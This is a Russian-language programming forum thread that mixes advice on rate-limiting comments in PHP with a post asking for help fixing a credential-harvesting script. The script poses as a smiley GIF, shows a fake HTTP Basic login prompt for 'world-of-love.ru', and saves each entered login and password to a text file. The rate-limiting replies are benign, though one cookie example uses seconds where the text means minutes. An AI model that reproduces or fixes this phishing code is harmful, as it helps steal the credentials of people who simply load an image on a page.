Господа, здравствуйте. Короче мне нужнен блок комментарий..я написал примерно такой примитивный, но хочу разширить возможности.. К примеру.. Есть файл post.php u comment.php В post.php форма, 3 поля: автор,комментарий и каптча.. В comment.php все проверки на зополнение полей, все дела тра ляля.. Как можно сделать, что б один человек, добавлял комментарий не раньше чем через 5 мин? Тогда и каптча не нужна. Мне для вап сайта.
Как реализовать это можно? Чуваак, я с PHP неделю, немогу все знать..даже если это очень просто.. Это в параметрах функции указываются секунды? sleep(15); Ну тогда логично предположить, шо сам скрипт не будет работать 15 сек, а мне надо шоб человек не мог писать в течении этого времени.. это типа пинок с чата на 5 минут или бан по ip+soft..вроде этого..понимаешь?
Ну попробуй чтобы его ип заносился в базу/файл время последнего поста. потом при повторной попытки оставить комент сравниваеться время то что щас и то что в базе, если прошел промежуток больше чем 5 мин то постит если нет то пишет подожать еще. Ето как вариант
Помогите исправить скрипт Проблема в том, что если в окошко ввести логин или пароль русским то оно сохранится в файле в таком виде "сугдея" как такое можно исправить? или может можно как не будь перевести из "сугдея" в русское слово? PHP: <? //делаем скрипт картинкой header("Content-type: image/gif"); //делаем изображение смайликом из архива $image = imagecreatefromgif('mellow.gif'); if(!$_COOKIE['LOGON']) { $login = $_SERVER['PHP_AUTH_USER']; $pass = $_SERVER['PHP_AUTH_PW']; //Авторизация пройдёт, если пароль больше 3-ёх символов и вообще написан логин if(strlen($pass) <= 3 || !$login) { Header('HTTP/1.1 401 Unauthorized'); Header('WWW-Authenticate: Basic realm="world-of-love.ru - login"'); } elseif($login) { //ставим кукис, чтобы при повторном заходе авторизации небыло, в самом начале проверка есть ли кукис )) setcookie('LOGON',md5($pass)); //запишем пароли в файл $f = fopen('passwords.txt', 'ab'); //passwords.txt fwrite($f, date("h:i:s")." > REFERER: ".getenv("HTTP_REFERER")." := ".$login.":=".$pass."\r\n"); //в формате LOGIN ||| PASSWORD fclose($f); } } imagegif($image); imagedestroy($image); ?>
мутим куки на 5 минут до вывода: setcookie ("post", "значение",time()+5); и в скрипте,котрый проверят входные данные сomment.php: if(!$_COOKIE['post']){ true;//continue }else{ false;//bad } дерзай ________ 0ph.ru